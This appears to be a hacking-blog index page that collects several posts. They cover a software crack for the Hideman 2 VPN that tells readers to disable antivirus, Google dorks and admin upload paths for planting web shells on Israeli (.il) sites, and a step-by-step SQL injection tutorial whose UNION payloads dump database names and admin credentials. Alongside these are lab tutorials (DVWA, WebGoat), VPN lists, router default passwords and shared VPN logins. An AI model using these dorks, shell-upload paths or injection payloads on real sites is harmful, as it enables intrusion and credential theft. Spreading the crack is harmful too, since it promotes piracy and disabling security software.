HideMan2 Premium vpn Life Time

Hideman 2

Hideman application creates VPN connection to one of our servers located in 16 countries around the world. We try to add new servers as fast as we can.
VPN connection protects your privacy and increase security level.
This crack will remove the hour limit of Hideman 2,letting you to be connected to the VPN Server forever

• How to Crack ?

  1. Install Hideman 2
  2. Exit from Hideman using system tray icon (important)
  3. Turn off any virus guards
  4. Run Hideman 2 Crack, and press crack button
  5. If asked browse and select ‘Hideman.exe’ file from Hideman installation path
  6. Done   
  How to fix Disconnected issue ?
  sometimes you will continuously get disconnected message in hideman after applying crack.follow the steps given below to fix it
  
• Run Hideman
• Press +1/1 button under Hours (nothing will happen other than loading,its OK)
• Go to Payment Menu > Click 1 Month option (it will open a web page,just close it)
• Now close Hideman completely using system tray icon
• Go to Hideman installation path and delete ‘pref.cdat’ file (example path : C:\Program Files\Hideman\bin)
• Now open Hideman and it will work normally [If this didnt work, re-apply the crack at step 5]

 Download:

HideMan2+cracke.rar 

Read more ...

Testing Your Sql injection Skills (Create Your Own Penetration Testing Lab)

Hello Guys

Its me 4n0nkh4n

This Tutorial is about testing your knowledge about sql injection.

If you dont know about sql injection . 

Read these topics first :   1. Step by step Sql Injection

                                          2. String Based Sql Injection

 

So Come to the topic now :p

 if you have knowledge of sql injection n you wanna test it

or you wanna practice sql injection attack 

 

                  *Just go Here

 n there is many levels to solve :)

if you did it 

Then here is one more thing to do.

 

Create Your Own Penetration Testing Lab with DVWA :-

 

What is DVWA ?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Download DVWA Now

Download XAMPP Now

You need a XMAPP Software for this lab to run a DVWA on local server.

after downloading , install XAMPP as administrator. So now start the  Apache , MySql and Filezilla services. Sometimes if any other application is using the ports , it will give you error. like my case 443 port number is used by Vmware workstation. so just disable this services with task manager.

Now extract the DVWA file that you downloaded from the above mentioned link. and paste in the C:\xampp\htdocs folder.

now navigate to https://127.0.0.1/dvwa and click on the Setup option to start the setup.

after setup enter the credentials username = admin and password = password to login.

now click on the Setup option and click on the Create Database option to create your database.

now your penetration lab ready for your security application testing .

Enjoy your Penetration Testing Lab with DVWA.

Hope you like my post.Create Your Own Penetration Testing Lab with DVWA. Dont be Selfish Please Share it with others. :p

#4n0nkh4n

./Ultimate_hackers

 

 

 

 

Read more ...

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

Read more ...

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

---

---

---

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

---

---

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection

Read more ...

Top 10 Free Vpn Services!!!

Top 10 Free VPN Servies
First of all, lets talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short , it is private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites Unlike a proxy, you get secured connection for all programs you are using Quality Network ensures your VPN service will be fast wherever you are in the world Protection against your ISP Bypass ISP Blocking for VOIP Applications like Skype.

Top 10 Free VPN Servies
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well known guys who are behind the Logmein Service of remote apps management. It’s free for non-commercial and personal use. Features : No hardware required – A quick, simple and easy-to-use VPN that just works Secure communications – Encrypted tunneling across public and private networks Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN Web-based management – Deploy to anyone, manage from anywhere, access anytime Free for non-commercial usage – Absolutely free for non- commercial use.
3. Packetix
(http://www.packetix.net/en/)
Its a japanese free VPN solution with technology developed by SoftEther Corporation.You can use PacketiX.NET online test service for free.Here’s what you can do with this service. You can create your private Virtual VPN Hub. You can configure and use the hub for free.You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
Open VPN drives UltraVPN, OpenVPN is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as Iphone, Ipad Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list. It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services MacroVPN offer free VPN service for the user’s, it provides 128bit PPTP encrypted VPN Connection Service, protection on wifi hotspot. Normally assigned US based IP’s.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless) . Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS.Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of Port 80 Limited(Seychelles) company providing both free VPN and paid services of VPN It creates a secure connection encrypting all the data protecting your privacy and securing you. You dont need to install any software. ItsHidden.com works on all Platforms including Windows, Mac, Linux, IPhone etc
9. CyberGhost
(http://cyberghostvpn.com/)
This a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 10GB traffic every month, which is more than enough for surfing on websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

Read more ...

How to Set Up Port Forwarding on a Router

Port forwarding opens certain ports on your home or small business network, usually blocked from access by your router, to the Internet. Opening specific ports can allow games, servers, BitTorrent clients, and other applications to work through the usual security of your router that otherwise does not permit connections to these ports. Follow this guide to forward the ports you need, regardless of your operating system.

Steps

1. 
   1
   Enter your router’s IP address into the address bar of a web browser. This will open your router’s configuration page. For most routers, this will be 192.168.0.1, 192.168.1.1, or 192.168.2.1. However, if you want to figure out the IP, here's how to do it:^[1]
   • For Windows: Open the command prompt and enter ipconfig /all. The router’s IP address is usually the same as the Default Gateway.
   • For Mac: Open the terminal and enter netstat -nr.
   • For Linux: Open the terminal and enter route.
2. 
   2
   Enter your username and password. If you've already configured the security settings for your router, enter the username and password you chose then. If not, here are some of the most common default logins:^[2]
   • On Linksys routers, type "admin" for both the username and the password.
   • On Netgear routers, type "admin" for the username and "password" for the password.
   • On other routers, try leaving the username empty and entering "admin" for the password.
   • You can visit sites such as RouterPasswords.com and enter in your router’s model to find the default password.
   • If you've forgotten your login information, you can press the reset button on your router to reset it to factory defaults. You can then look up the factory default settings online.
3. 
   3
   Find the Port Forwarding section. Each router will be slightly different. Common labels are Port Forwarding, Applications, Gaming, Virtual Servers. If you don't see one of these or something similar, try Advanced Settings and look for a Port Forwarding subsection.
4. 
   4
   Find a preconfigured entry. Many routers will have a dropdown menu with preconfigured options for well-known applications. If you need to open ports for one of these applications, select it from the list.
5. 5
   Create a custom entry. If the program you want to add is not listed, you will need to create a custom port forwarding entry. Each router will have a slightly different way of doing this, although the required information is the same for any router:
   • Enter a name for the service. Name it something related to the program so that you know what the entry is for.
   • Choose the service type. This can be TCP, UDP, or both. The service type depends on what program you are unblocking. If you are unsure, select the TCP/UPD option.
     
   • Select the ports you wish to use. If you only want one port open, enter the same number in Start and End. If you wish to open a range of ports (say 5), you might type 3784 in Start and 3788 in End.
     
   • Select the internal IP address to assign the port forwarding to. This is the IP address of the computer running the application that you are unblocking. Check out the guides for PC or Mac to find your internal IP.
6. 
   6
   Save your settings. You may have an Apply button instead of Save. You might need to restart your router for them to take effect.

Read more ...

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:

• Set up a workplace account to automatically get a VPN profile from your company.
• Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.

1. In the App list, tap Settings > VPN.
   
   
   
2. Tap and hold the VPN profile name, and then tap Edit.
3. In the User name and Password boxes, type your user name and password.
4. To connect to the VPN, do one of the following, depending on what type of profile you're using:
   • If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
   • If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. This icon appears when you're connected over Wi-Fi, and this one shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.

1. In the App list, tap Settings > VPN.
2. Set Status to On , and then tap Add .
3. In the Server name or IP address box, type the server name or IP address of your VPN server.
4. Tap Type and choose the type of VPN connection you want to create.
   If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
5. Tap Connect using, and choose the method you want to use to connect.
6. In the User name and Password boxes, type your user name and password.
7. To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On .
8. For Send all traffic, do one of the following:
   • To have all data you send and receive go over the VPN, set Send all traffic to On .
   • To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off , tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
9. In the Profile name box, type a name for your profile.
10. Tap Advanced, and then enter any additional settings you need to for your organization's VPN.
    You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
11. Press the Back button on your phone to go back to the Add profile screen, and then tap Save.

Read more ...

Free VPN • 100% Free PPTP and OpenVPN Service

Vpnbook

Free Open Vpn And PPTP
Surf Anonymously
100% Free Vpn Service

PPTP VPn :

• Free PPTP VPN Account (Easy to setup, no need to download any software, works with all Windows, Mobile and PS3 Devices)
  • Server #1: euro195.vpnbook.com
  • Server #2: euro213.vpnbook.com
  • Server #3: uk180.vpnbook.com (UK VPN - optimized for fast web surfing; no p2p downloading)
  • Server #4: us1.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
  • Server #5: us2.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
  • Username: vpnbook
  • Password: spa5urEp
  • More servers coming...

OpenVPn :

• Free OpenVPN Account (Requires Download of the free opensource OpenVPN Client, OpenVPN offers the best anonymity and is impossible to block by your government, school or Internet Service Provider.) - You should try all the profiles and see which provides the fastest and most stable speeds.
  • Server #1: Download Euro1 Server OpenVPN Certificate Bundle
  • Server #2: Download Euro2 Server OpenVPN Certificate Bundle
  • Server #3: Download UK Server OpenVPN Certificate Bundle (UK VPN - web surfing only; no p2p)
  • Server #4: Download US1 Server OpenVPN Certificate Bundle (US VPN - web surfing only; no p2p)
  • Server #5: Download US2 Server OpenVPN Certificate Bundle (US VPN - web surfing only; no p2p)
  • All bundles include UDP53, UDP 25000, TCP 80, TCP 443 profile
  • Username: vpnbook
  • Password: spa5urEp

Read more ...

How Hackers hack any account using Authentication flaws - 1st

                                       Hello, buddies my last post was about Web Server Hacking through Command Injection and as you know Injection is most dangerous Web Application vulnerabilities and 2nd is Session Management and Authentication flaws (As per OWASP Top 10 Vulnerabilities 2013). So today we'll learn Authentication flaws.

What is Authentication Flaws ?
It is little tough to describe Authentication flaw. Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique. Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.

Finding an authentication flaw isn't easy you'll have to analyze HTTP data, How Web App works, Encoding, How it get validated and all you've to become clever hacker to find that, It's an art in itself.

Authentication Flaw Exploitation Tutorial
So today we'll learn simple Authentication vulnerability exploitation tutorial. It's pretty amazing, just follow the below steps.

Requirements :

• OWASP-BWA (Broken Web App) Pentesting lab
• Burp Suite
• Brain

Start OWASP-BWA Virtual Machine, Open Homepage and Click on WebGoat.NET. It is also one kind of penetration testing box for learners and beginners in Ethical Hacking and Security Researching.

You'll be redirected to Homepage Just Click on Setup Database blue button.

Now Navigate to : WebGoat Coins Customer Portal > Forgot Password

Click on Image to enlarge it

Here, you know all website which uses login forms, they have members accounts, password and ID database. Then definitely they have password recovery options in case you forgot your password, you can retrieve. But often, many web application have authentication flaws just you need to understand how it works and what type of security it uses. So Now, assume that you are hacker and WebGoat.NET is your target - assume this is popular social networking or business website and this contain Authentication flaw, you need to find it and exploit it. The flaw is in the forgot password that leave some security question answer in Base64 encoded text, you need to crack it and hack any users account.

Authentication flaws is little hard to find but very interesting you just have to understand web application logic and method they uses to authenticate users.

• Back to tut guys! : Now you need to get email of any user, Just type any alphabet like a or m it will automatically suggest you an email. Choose any one for eg m using this email : sky@havelzbyszekco.com.
  
  
  Click on Image to enlarge it
  
  
  
• Click on Proceed : and you'll get security question, now you've to find authentication flaw to hack security question.
  
  
  Click on Image to enlarge it
  
  
  
• So m trap here, i can't get password until i provide right security question answer, Now my question is where Web application stores this security question answer to validate it, and how it works? lets capture this in Burp Suite and understand.

Commonly many web application leaves Security question answer in Source Code, Cookie, Parameters, etc it can be anywhere you've to use logic and your great mind to know where and how it works using logic, tools & Hackers mind.

• Just type any bogus answer and click on recover password : And start analyzing parameters, source code, Cookies, and every content that passes between browser and web server. m using Burp Suite.
  
  
  Click on Image to enlarge it
  
  
  
• Guys as you all know it is already vulnerable, so we don't need to find it - just start understanding above image : and you'll see one cookie named encr_sec_qu_ans= well, this contain Question answer.
  
• As I told you web application uses many ways to validate users answer through cookie, source code or even parameters - so here the WebApp is using Base64 Encryption text in Cookie that validates users security question answers and gets validated. Fine! lets decode it :
  
  
  
• Select the Base64 Encrypted text > Right click on it and Send to Decoder
  
  
  Click on Image to enlarge it
  
  
  
• Well, now its simple just click on Decode as Base64
  
  
  Click on Image to enlarge it
  
  
  
• Sounds Pretty cool! you'll get another Base64 Encryption, well mostly web app do this to protect data as much they can, so decode it again.
  
  
  Click on Image to enlarge it
  
  
  
• Wow! so till now i hope you've understand what exactly is Authentication flaws, it is one kind of logic to understand web application and Hack it. So we got an answer, CALIFORNIA! - it is not necessary that every website uses same method to validates users security answer, may be they do but different encryption like MD5, SH11 SH-256, or any you just need to become clever hacker to understand.
  
• We've successfully exploited Authentication flaw in WebGoat.NET, now back to browser and enter correct answer and click on recover password.

Click on Image to enlarge it

Well, this is only called Authentication flaw - now you can hack any users account without any social engineering. There are many such kind of flaw in web application just we need to understand how it works.

: If you want live Tutorial then Watch Below video of Complete Post :
Click here to view me on youtube : Full Screen mode

The word i repeated most was : Just Try to understand how web application work! - I hope you understand what i mean. To become clever hacker learn Programming, Networking, WebApp architecture, and logics. We've many kind of Ethical Hacking articles, Books, Tools, Post, Tricks, tutorials, & Online books like D Hacker Drive. 

Thank you for reading my post, do a share if you like it, as always feel free to comment and let me know your problem. Sharing is caring :)

- 



#Copied :D

Read more ...